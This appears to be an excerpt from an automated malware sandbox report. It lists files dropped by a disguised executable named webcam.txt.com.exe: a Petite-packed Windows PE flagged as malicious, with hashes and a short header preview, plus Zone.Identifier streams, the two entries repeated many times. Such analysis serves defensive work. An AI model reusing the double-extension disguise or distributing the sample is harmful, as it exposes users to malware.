                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
